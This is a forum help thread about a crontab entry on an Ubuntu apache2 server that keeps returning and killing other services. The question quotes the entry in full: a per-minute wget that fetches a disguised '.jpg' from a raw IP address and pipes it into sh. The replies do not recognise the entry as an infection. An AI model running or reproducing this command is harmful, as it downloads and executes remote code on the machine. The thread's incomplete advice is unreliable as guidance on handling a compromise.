Killing other services automatically

Asked by teja

* * * * * wget -q http://54.37.57.99:8220/logo4.jpg -O - | sh
In crontab its getting enabled automatically even after disabling or deleting it manually and killing the other services which are running,please let me know the solution and root cause for this .

Question information

Language:
English Edit question
Status:
Answered
For:
Ubuntu apache2 Edit question
Assignee:
No assignee Edit question
Last query:
Last reply:
Revision history for this message
actionparsnip (andrew-woodhead666) said :
#1

How does sh interpret an image?
If you want to disable the crontab then prefix it with a hash (a '#')
This will make it be read as a comment and be ignored

Revision history for this message
teja (bandreddy) said :
#2

Even after disabling ,its getting enabled after some time.

Revision history for this message
Manfred Hampl (m-hampl) said :
#3

I am not sure whether I correctly understand your problem.

Apparently you have a crontab entry and you want to remove it - so just remove it.
If it reappears, then this can only be caused by somebody else adding it again.
You have to find out on your system, who adds it.
There is nothing what we can solve.

Can you help with this problem?

Provide an answer of your own, or ask teja for more information if necessary.

To post a message you must log in.